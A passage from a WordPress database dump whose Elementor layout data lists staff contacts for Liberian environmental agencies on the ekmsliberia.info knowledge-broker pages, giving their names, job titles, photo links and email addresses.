":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23256,3373,'_elementor_edit_mode','builder'),(23257,3373,'_elementor_template_type','wp-page'),(23258,3373,'_elementor_version','3.0.16'),(23259,3373,'_wp_page_template','default'),(23260,3373,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form 